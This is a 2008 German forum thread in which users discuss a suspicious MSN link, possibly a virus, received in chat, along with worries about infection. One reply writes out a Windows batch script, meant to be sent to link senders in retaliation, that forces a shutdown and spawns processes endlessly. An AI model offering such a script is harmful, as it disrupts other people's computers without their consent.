Community
menu Registrieren menu Mitglieder Login menu Chat menu Flirtsuche menu Forum
 Schule & Uni
menu Referate / Hausarbeiten
 Informationen
menu FAQs
 Statistik
Mitglieder401.281
Neue User0
Männer197.671
Frauen196.779
Referate12.458
Forenbeiträge3.080.734
 Neue Mitglieder
  • Profilbild von Mylinhmimi1234

    Weiblich Mylinhmimi1234
    Alter: 31 Jahre
    Profil

  • Profilbild von VincentStanz

    Maennlich VincentStanz
    Alter: 33 Jahre
    Profil

  • Profilbild von Vinpilz1984

    Maennlich Vinpilz1984
    Alter: 33 Jahre
    Profil

  • Profilbild von Se7enChords

    Maennlich Se7enChords
    Alter: 18 Jahre
    Profil

  • Profilbild von AndreaClaudia

    Weiblich AndreaClaudia
    Alter: 47 Jahre
    Profil

  • Profilbild von TimSchluckedo

    Maennlich TimSchluckedo
    Alter: 38 Jahre
    Profil

  • Profilbild von richard7

    Maennlich richard7
    Alter: 27 Jahre
    Profil

  • Profilbild von maxi810

    Weiblich maxi810
    Alter: 44 Jahre
    Profil

  • Profilbild von Camobaum

    Maennlich Camobaum
    Alter: 15 Jahre
    Profil

  • Profilbild von Aminhadad

    Maennlich Aminhadad
    Alter: 21 Jahre
    Profil

     
Foren
Computer & Internet
Forum durchsuchen:

 
Thema:

MSN Virus (?)

(730x gelesen)

Seiten: 1

Du mußt dich registrieren, bevor Du einen Beitrag bzw. eine Antwort erstellen kannst.

Beitrag von Bartleby

09.06.2008 16:10:45

Bartleby

Profilbild von Bartleby ...

Themenstarter
Bartleby hat das Thema eröffnet...

heyho... habt ihr auch sowas bekommen?

NICHT klicken ^^

foto? htp://myspaces.my5gb.com/myspace.php?=****************

hab zwar den link n bisschen abgeändert damit keiner klicken kann, aber sicher is sicher...
**** ist meine eigene emailaddresse...

weiß da wer näheres drüber? muss ich mir sorgen machen?
danke ^^

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von DaSexyChiggo

09.06.2008 16:24:23

DaSexyChiggo

Profilbild von DaSexyChiggo ...

omg......

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von terax_zero

09.06.2008 16:30:40

terax_zero

terax_zero hat kein Profilbild...

tja is doch klar das man auf sowas nicht klickt

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von Bartleby

09.06.2008 16:33:14

Bartleby

Profilbild von Bartleby ...

Themenstarter
Bartleby hat das Thema eröffnet...

jajajaja, dieses alte geblubber von wegen "is ja klar dass man nich klickt" is mir völlig banane ^^

den link bekam ich in einer unterhaltung, und es passte sogar richtig ins gespräch, daher hab ich geklickt... is nu nich so dass ich das ding einfach kommentarlso von irgendwem bekommen hätte...

also spart euch eure pseudoarroganz, und sagt mir ob ich mir sorgen machen muss und obs andere auch bekommen haben, danke

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von DaSexyChiggo

09.06.2008 16:47:37

DaSexyChiggo

Profilbild von DaSexyChiggo ...

dann musst aber die situation auch erklären und ich habs auch schon bekommen, öfters auch von der selben pers. aber immer nur wenn sie of. geht, daher wunderts mich etwas das mitten im gespräch kam, möglich ist natürlich das du mit betretten der seite nen Virus geladen hast, aber direkt haben muss du ihn nicht.^^

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von DaSexyChiggo

09.06.2008 16:48:45

DaSexyChiggo

Profilbild von DaSexyChiggo ...

autsch, ich sollte vorher lieber mal lesen was ich da verzapfe...lol sry

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von Fearless

09.06.2008 17:03:38

Fearless

Fearless hat kein Profilbild...

ja was kam denn nachdem du drauf geklickt hast???

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von terax_zero

09.06.2008 19:05:36

terax_zero

terax_zero hat kein Profilbild...

wenn leute euch links mit verseuchten seiten schiken, schikt dennen eine .bat datei mit folgendem inhalt:

@echo off
title dragonpower
color 15
shutdown -s -t 50 -c " haha "
:start
start
goto start
end

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von Sunsetdreams

09.06.2008 19:09:05

Sunsetdreams

Profilbild von Sunsetdreams ...

joa is oft so... ^^ komische scheiße.. einfach nich drauf klicken^^ und gut is^^

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von terax_zero

09.06.2008 19:15:36

terax_zero

terax_zero hat kein Profilbild...

Übrigens gibts Virenscanner mit Webschutz, wobei die seite überprüft wird.
dann weis man es.

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Beitrag von dori05

18.06.2008 22:36:18

dori05

dori05 hat kein Profilbild...

ich hab auch so einen ähnlichen link bekommen, erst war gar nichts, mittlerweile kann ich nicht mehr auf einige seiten im internet zugreifen, ich habe internet explorer, firefox und opera probiert, nirgends war es besser, ich hab mind. 4 verschiedene virensacanner durchlaufen lassen...auch nichts...weiß jemand von euch, was ich jetzt tun kann??

Profil | Livenachricht | SMS senden | Gästebuch | Nachricht | Bildergalerie


Seiten: 1

Du mußt dich registrieren, bevor Du einen Beitrag bzw. eine Antwort erstellen kannst.

MSN Virus (?)
Weitere interessante Beiträge aus dem Forum:
Referate Trump virus,wurm,trojaner?
Virus??
virus
Virus??
Virus-Proggi gesucht
virus???


Dein Live Messenger LiveMessenger

Diese Funktion ist nur für Mitglieder verfügbar.

Anmelden | Login

Keine neue Nachricht
Jetzt Gratis bei Pausenhof.de registrieren...

137 Mitglieder online